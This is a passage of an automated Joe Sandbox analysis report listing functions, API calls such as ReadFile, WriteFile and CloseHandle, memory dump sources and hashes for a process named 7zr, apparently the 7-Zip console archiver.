                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$free
                            • String ID:
                            • API String ID: 2654054672-0
                            • Opcode ID: 5de01816b17388213ee141771819db643b9a687e723b8c2057960ad16fa75941
                            • Instruction ID: a3b15e7785ae1d4118531ec0a01523b1138bf7a6df9cc4a7e374b4733ac65050
                            • Opcode Fuzzy Hash: 5de01816b17388213ee141771819db643b9a687e723b8c2057960ad16fa75941
                            • Instruction Fuzzy Hash: BFF02130914B50EACB0AEBA8C4263DDBBE5AF04300F10465DE056622C2CBFC9A408788
                            Function 00708565 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 487bb6ec9c82c53cbb182e2c04f5aab68c60f1ca265519017edbdaa2ff194ce9
                            • Instruction ID: 596e703d21ef1e55e8b7f6dd618c7835aa8eb59985861b6c5e68d123eac58731
                            • Opcode Fuzzy Hash: 487bb6ec9c82c53cbb182e2c04f5aab68c60f1ca265519017edbdaa2ff194ce9
                            • Instruction Fuzzy Hash: FBF0C272E0005AEBCB04DF98D8448EFBBB5FF44790F00816AF41AE7251CB388A11CB91
                            Function 00715505 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 0071550A
                              • Part of subcall function 00714E8A: __EH_prolog.LIBCMT ref: 00714E8F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 6d5a69ddbaad8401d244aeec1341140233b40af61cddfc6bd9fa952b662e161c
                            • Instruction ID: 23fb0a5630f5f037239e27fd43dd9da55990e86614902830b261835f6242b323
                            • Opcode Fuzzy Hash: 6d5a69ddbaad8401d244aeec1341140233b40af61cddfc6bd9fa952b662e161c
                            • Instruction Fuzzy Hash: 63F06576600915EBCB059F48D815ADE7BBBFF84364F104429F40557241DB79DD108BA0
                            Function 006F9987 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 54d232ecd89f7076a0bb2557ff3f36f148a64ce16b7a6ef62a995a881dc7d499
                            • Instruction ID: bc8bbe20327b9fd2c645189cff8ff5ccf24e3692df1e68c70b37fefcc18cdb51
                            • Opcode Fuzzy Hash: 54d232ecd89f7076a0bb2557ff3f36f148a64ce16b7a6ef62a995a881dc7d499
                            • Instruction Fuzzy Hash: 5EE0ED75600508EFC714EF98D855F9AB7A9EB48354F10886AF40AD7241C7799911CA64
                            Function 00715E2B Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00715E30
                              • Part of subcall function 007108B6: __aulldiv.LIBCMT ref: 0071093F
                              • Part of subcall function 006EDFC9: __EH_prolog.LIBCMT ref: 006EDFCE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$__aulldiv
                            • String ID:
                            • API String ID: 604474441-0
                            • Opcode ID: ca8b0cc0d8cc9493d916622973f1e51bc6df64a3a2ed0706630f0ddda316ef7b
                            • Instruction ID: 229438a3b5bccb1fe8361eef63d677058bc6f0e543229a331ce1e61d8d78aa97
                            • Opcode Fuzzy Hash: ca8b0cc0d8cc9493d916622973f1e51bc6df64a3a2ed0706630f0ddda316ef7b
                            • Instruction Fuzzy Hash: 43E039B0A01750DFCB95EBB8D14528EB6E4BB08700F00586EA046D3B81DAB8AA408B80
                            Function 00718ED1 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00718ED6
                              • Part of subcall function 00719267: __EH_prolog.LIBCMT ref: 0071926C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 4325566b9c72f3ef668fcdd12665a804f1f91ce50a9d05c387211104c54a6601
                            • Instruction ID: 57db4e53e5fd5ca35c0586038bd5132914057b167de3bfd850bb603262026c7b
                            • Opcode Fuzzy Hash: 4325566b9c72f3ef668fcdd12665a804f1f91ce50a9d05c387211104c54a6601
                            • Instruction Fuzzy Hash: 53E09271A20920DACB09EB68D526BDDB7A8FF04704F000A5DE403926C2DBB86604C781
                            Function 006D7C68 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                            Download Yara Rule
                            APIs
                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 006D7C8B
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: 0f573455fcfe47b923e081f2c32c561a56238837b07cc64bd3fd6147cb12eae8
                            • Instruction ID: c08e59c4f37ce1118d7d296a3f9e718a9407fae5ccc0a284b7c731278cd374f5
                            • Opcode Fuzzy Hash: 0f573455fcfe47b923e081f2c32c561a56238837b07cc64bd3fd6147cb12eae8
                            • Instruction Fuzzy Hash: 2DE0E575A00209FFCB11CFA5D801B8E7BB9AB09758F20C06AF919AA260D7399A50DF54
                            Function 0071BE69 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 0071BE6E
                              • Part of subcall function 00715E2B: __EH_prolog.LIBCMT ref: 00715E30
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 9e472534bae2877428cebf900ea8354e88f28091c662eee1ccb9d9fb61b1d5f0
                            • Instruction ID: c6762a6eaccec037d4c7e6591fb8cab42189292bbad6e7d844bae55257f01a76
                            • Opcode Fuzzy Hash: 9e472534bae2877428cebf900ea8354e88f28091c662eee1ccb9d9fb61b1d5f0
                            • Instruction Fuzzy Hash: 1EE09BB1A14A60C7D715EB28D4197DDB7B4BF00314F00845EE496D31C1CFB85604C7A1
                            Function 006D2201 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID:
                            • API String ID: 1795875747-0
                            • Opcode ID: cdf70817c3c6289ad8926ad12ba9ba94bd0dcdaaaeea7c9a972bdf4d0b28af83
                            • Instruction ID: 59c0ed1378abee48c24b73b3c0542661126eeb0ab871e63318644759165227f0
                            • Opcode Fuzzy Hash: cdf70817c3c6289ad8926ad12ba9ba94bd0dcdaaaeea7c9a972bdf4d0b28af83
                            • Instruction Fuzzy Hash: 2ED0123250411DABCF156B94DC05CDD77BDEF0C254700442FF555E2150EAB5E5149794
                            Function 0070F745 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 0070F74A
                              • Part of subcall function 0070F784: __EH_prolog.LIBCMT ref: 0070F789
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 77e60b4923b71950e6289e32c34d43ed822ac054c027d399e26a019c0a4ffe4f
                            • Instruction ID: 16a4f9bd668e8036d828722b3cb1887288e4e6067c2e3a094f9be6e50b01f445
                            • Opcode Fuzzy Hash: 77e60b4923b71950e6289e32c34d43ed822ac054c027d399e26a019c0a4ffe4f
                            • Instruction Fuzzy Hash: 4DD012B1A50204FFDB14DB55D856BAEB778EB40754F10452EF00561141C3B9590086A5
                            Function 006D7B4F Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                            Download Yara Rule
                            APIs
                            • ReadFile.KERNELBASE(00000002,?,?,00000000,00000000,00000002,?,006D785F,00000000,00004000,00000000,00000002,?,?,?), ref: 006D7B65
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 1da2d3b32c471c291efb33492edb2fc6a1f47243d1f2ae5c503f6886dc687fbf
                            • Instruction ID: 33912bd8109fe7ab487a928c8ef010de5e97babf99f4d74550201d46aa5aa8ce
                            • Opcode Fuzzy Hash: 1da2d3b32c471c291efb33492edb2fc6a1f47243d1f2ae5c503f6886dc687fbf
                            • Instruction Fuzzy Hash: F5E0EC75200208FBDF01CF90CC01F8E7BB9AB49758F208058E905A6160C775AA54EB54
                            Function 007280AA Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 007280AF
                              • Part of subcall function 006D1E0C: malloc.MSVCRT ref: 006D1E1F
                              • Part of subcall function 006D1E0C: _CxxThrowException.MSVCRT(?,00784B28), ref: 006D1E39
                              • Part of subcall function 0071BDB5: __EH_prolog.LIBCMT ref: 0071BDBA
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrowmalloc
                            • String ID:
                            • API String ID: 3744649731-0
                            • Opcode ID: 12a75a69c7814f4e744269cb77bdd769112d23e43a9f82cdc5f4edc00aba7a74
                            • Instruction ID: 8842d657ada72b3e9eba21bca9106b811b21ac512fecdf2b1b9026b133d49e54
                            • Opcode Fuzzy Hash: 12a75a69c7814f4e744269cb77bdd769112d23e43a9f82cdc5f4edc00aba7a74
                            • Instruction Fuzzy Hash: 47D01771B02601AECB48EBB8A42676E72A1AB45340F00457EA41AE6781EF788A008615
                            Function 006D6848 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                            Download Yara Rule
                            APIs
                            • FindClose.KERNELBASE(00000000,?,006D6880), ref: 006D6853
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CloseFind
                            • String ID:
                            • API String ID: 1863332320-0
                            • Opcode ID: 6c9293d8a552d7f5d532fd26d8ee0ac4c093acf2468117c9b788c6c4f38d6984
                            • Instruction ID: b01fe20162b3e16cc265fda4a193d2bbae991b98ce31d723d535e9b752e97575
                            • Opcode Fuzzy Hash: 6c9293d8a552d7f5d532fd26d8ee0ac4c093acf2468117c9b788c6c4f38d6984
                            • Instruction Fuzzy Hash: D9D01231514221468A645E7DB8449C533D96F06374321475AF0B4C73E1E7608CC366A0
                            Function 006D2010 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID:
                            • API String ID: 1795875747-0
                            • Opcode ID: 3d3d1d8794368c5f043bbacbef961a990c96d4844760cfffa849f0312137a4c8
                            • Instruction ID: 8dd360bdd36ea797443af5adb17060045cfb47e950f345bf9ce6f6bbab5c56dc
                            • Opcode Fuzzy Hash: 3d3d1d8794368c5f043bbacbef961a990c96d4844760cfffa849f0312137a4c8
                            • Instruction Fuzzy Hash: 35D0C7360082519F96555F15EC05C87BBA5FFD5361711082FF440511705B625855DA64
                            Function 006D1FA0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputc
                            • String ID:
                            • API String ID: 1992160199-0
                            • Opcode ID: f125713b9c6fb02057fd8aabb54b164e7e8463fdd30d8ca54fabf94559cc4efe
                            • Instruction ID: d660a0c834a8351e6166e50949cea6dfe73b24be4a98770ee72527da5f34b11c
                            • Opcode Fuzzy Hash: f125713b9c6fb02057fd8aabb54b164e7e8463fdd30d8ca54fabf94559cc4efe
                            • Instruction Fuzzy Hash: 31B092323082209BE6191A9CBC0AAC06794DB0D772B21006FF548C21909A911C814B99
                            Function 006D7C3B Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                            Download Yara Rule
                            APIs
                            • SetFileTime.KERNELBASE(?,?,?,?,006D7C65,00000000,00000000,?,006DF238,?,?,?,?), ref: 006D7C49
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: FileTime
                            • String ID:
                            • API String ID: 1425588814-0
                            • Opcode ID: 122ec5f7e951707297385df789c923a1c4c7eff13487642c98262eefcaabb0ad
                            • Instruction ID: 68820ea5c464122eefb9a9048b3930805ff2b6450e33244fa6db7d9df7c22c99
                            • Opcode Fuzzy Hash: 122ec5f7e951707297385df789c923a1c4c7eff13487642c98262eefcaabb0ad
                            • Instruction Fuzzy Hash: E7C04C36158105FF8F020F70CC04C1ABBA2ABA9711F10C92CF159C4070C7328064EB02
                            Function 006D7D3C Relevance: 1.5, APIs: 1, Instructions: 6fileCOMMON
                            Download Yara Rule
                            APIs
                            • SetEndOfFile.KERNELBASE(?,006D7D81,?,?,?), ref: 006D7D3E
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: File
                            • String ID:
                            • API String ID: 749574446-0
                            • Opcode ID: a06d4a019e119487b7040a1b8c66af6eb0cfc384238820599ad538e50a4b3834
                            • Instruction ID: e43005c7c019e3046b0769c1fa8548d27cb4bdf08f28189e17daf516034c1450
                            • Opcode Fuzzy Hash: a06d4a019e119487b7040a1b8c66af6eb0cfc384238820599ad538e50a4b3834
                            • Instruction Fuzzy Hash: 5BA002B02E511F8F8F121F34DC0A8243BA1BB577477A067B8B007CA4F5DF264859AA05
                            Function 006DC4D6 Relevance: 1.5, APIs: 1, Instructions: 205COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: memmove
                            • String ID:
                            • API String ID: 2162964266-0
                            • Opcode ID: a428fd1099b025323583d87b1f6e1d54cfed1f3c3393297d730ff4581c4cbeb8
                            • Instruction ID: d1538e0491882b07230d49f4a553aa06661556b2595a2e66c02025217c2ec57f
                            • Opcode Fuzzy Hash: a428fd1099b025323583d87b1f6e1d54cfed1f3c3393297d730ff4581c4cbeb8
                            • Instruction Fuzzy Hash: 4B813C71E0424E9FCF24CFA9C484AEDBBB2AF48324F14856AE511A7341D771EA85CF54
                            Function 006E3E04 Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                            Download Yara Rule
                            APIs
                            • CloseHandle.KERNELBASE(00000000,00000000,006E3D8D,?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3E12
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: d8348bcbc50d269e8b9e4942fabdcd91ba648eafe718efe6c91a5e87f0965004
                            • Instruction ID: 8e89716736a0516082d7e63d1ff947d61b2c016ba14c81be4b245fb9906d571e
                            • Opcode Fuzzy Hash: d8348bcbc50d269e8b9e4942fabdcd91ba648eafe718efe6c91a5e87f0965004
                            • Instruction Fuzzy Hash: 4DD0127151532287DB705F2DF8087D163DE6F14361B15445EF880CB340E764CCC25A54
                            Function 00756BC6 Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: malloc
                            • String ID:
                            • API String ID: 2803490479-0
                            • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                            • Instruction ID: fa23675d5940ad2d0f81b49ee8ded5e4376ba91fe8e8ea75378dba08ac736fc1
                            • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                            • Instruction Fuzzy Hash: 06D0C9E162360646EF484A30485AAAA21942B5031BBB885B8EC13CB296FB5DD61D9258
                            Function 006D764C Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                            Download Yara Rule
                            APIs
                            • CloseHandle.KERNELBASE(00000000,?,006D75AF,00000002,?,00000000,00000000), ref: 006D7657
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 6351bc0989cd4a1fe2509f4c9f6df3cfd6520179e67bb7f39631541a6e56b783
                            • Instruction ID: 039ba60a4e07bb0b2b5546333aea319aa074361a4adae4881fbcd964e08c5cc4
